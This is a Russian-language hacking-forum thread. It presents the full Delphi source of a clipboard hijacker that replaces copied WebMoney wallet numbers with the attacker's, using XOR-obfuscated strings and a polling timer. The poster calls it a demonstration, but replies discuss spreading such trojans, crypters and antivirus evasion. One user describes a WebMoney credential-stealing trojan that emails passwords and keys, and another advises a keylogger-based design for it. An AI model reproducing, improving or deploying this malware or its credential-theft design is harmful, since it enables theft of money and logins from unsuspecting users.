Написал небольшую программку. Суть такова: висит себе тихонько на компе жертвы, при копировании в буфер обмена номера R или Z кошелька (ИМХО самый распространенный метод ввода кошелей в кипер) заменяет их на заранее заготовленные номерки. В итоге жертва вставляет не скопированный, а Ваш номер кошеля В программе для демонстрации вшиты кошельки R123456789101 Z123456789101 (придумал наобум) скачать Пароль: antichat.ru Если понравится, выложу исходники (Писал на Delphi + KOL). Хочу предупредить, что программа написана в целях демонстрации опасности данного метода обмана пользователя, а не, собственно, обмана
Не впарил. А вот беда паблика в том, что первым делом все попадает на вирустотал => в базы антивиров. Вы что, вообще не доверяете антивиру, который стоит на Вашей машине?
=) Гы, спс! Исходник программы: Code: program wmb; uses Windows, KOL; const wmr = '\?<=:;8967?>?'; // hidestring('R123456789101', 14) wmz = 'G,/.)(+*%$,-,'; // hidestring('Z123456789101', 29) type Twm = (Unknown, R, Z); var Timer: PTimer; Mes: msg; function hidestring(s: string; code: integer): string; var t: Integer; begin for t:=1 to Length(S) do S[t]:=Chr(Ord(S[t]) xor Code); Result:=S; end; function getwmtype(s: string): Twm; var c: char; e: integer; i: int64; begin result := Unknown; c := upcase(s[1]); if (length(s) <> 13) and (c <> chr($52)) and (c <> chr($5a)) then exit; if c = chr($52) then result := R else result := Z; delete(s,1,1); val(s,i,e); if e <> 0 then result := Unknown; end; procedure OnTimer(Sender: PControl); var s: string; begin if getwmtype(Clipboard2Text) = R then Text2Clipboard(hidestring(wmr, 14)) else if getwmtype(Clipboard2Text) = Z then Text2Clipboard(hidestring(wmz, 29)); end; begin Timer := NewTimer(200); Timer.OnTimer := TOnEvent(MakeMethod(nil,@OnTimer)); Timer.Enabled := true; while (GetMessage(Mes, 0, 0, 0)) do begin TranslateMessage(Mes); DispatchMessage(Mes); end; end. Хоть, как сказал _Great_, такое уже было (я видать в то время под стол ходил), думаю, не все знают о данной фишке. Попасться реально легко (не считая сложностей впаривания), будьте внимательны
я гдето уже видел подобное. Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold И звалась она помойму WmSpy Вот тока много толку от этоге может и небыть. Потому что после того как человек заметит что деньги ушли кудато не туда. То он посмотрит историю платежей, где будет светится твой кошелек. И потом могут быть проблемы с этим.
ога...а потом блэки с логами... -"Я перевел тебе деньги!" -"Я ничего не получал...Все пишу блэк..." З.Ы.:с подменой кошелей в буфере не писал трои только ленивый...^_^
У меня 2 таких троя на делпхи на визуалбайсик. 1-здесь нет остальных кошельков U,B,E. 2-Она некопируеца в системные папки и незалезает в авто запуск и непрячется от Alt+Ctrl+Del. Так что это трой безпозлезно распространять. Он тока на один раз запуска троя.Все трои с заменой кошелей старые им уж года 3 как я помню.
Радует то, что большинство знают о данной шалости. Если есть подозрения на то, что комп спидозный, обязательно смотрите что копируете, а что вставляете (одного раза может вполне хватить). З.Ы. Согласен, что прога не годится для практических действий, но я этого и не добивался =)
Во первых зря ты оскорбил человека. Это его личное дело , что , где и как проверять. Во вторых , автор выложил исходники , кому нужно подправят и перекомпилят. В третьих , лучше будет продаваться твой безпалевный криптор. В четвертых , не нравятся антивирусы и фаерволы, отсылай на проверку их системные файлы, пуст палят друг друга.
Народ хотел спросить совета. Я написал wm троя на делфи с оригинальным дизайном самой webmoney тока при вводе wmid и паса все приходит мне на мыло и ключи kwm и пасс кнему тоже на мыло сливается. При запуске автоматическии заменяет оргинал в webmoney.exe на троян. и тд. Но есть одно но, файл трояна весит 244кб в зжатом состоянии сжимал Upack. Как зделать размер поменьше чтоб на лоадер можно было ставить?. Можно ли готовый проэкт переделать в KOL. Кто знает как все это замутить.
2 X-zone Ты попробуй сделать чуть по другому. Пусть твой троян будет очень маленький. и его функции быдут такими: 1) стырит ключь 2) запустит реальный WM и поставит на него ловушку для клавы 3) стырит пас. 4) отошлет все на мыло. Тем самым размер - мининум. и работоспособность не теряется
Я в курсе про этот алгоритм работы это будет следующая моя прога.Но дело в том чтоя хочу оптимизировать этот проект который зделал невыкидвать же его тока изза больщого размера.Пока его некто непалит вот что хорошо.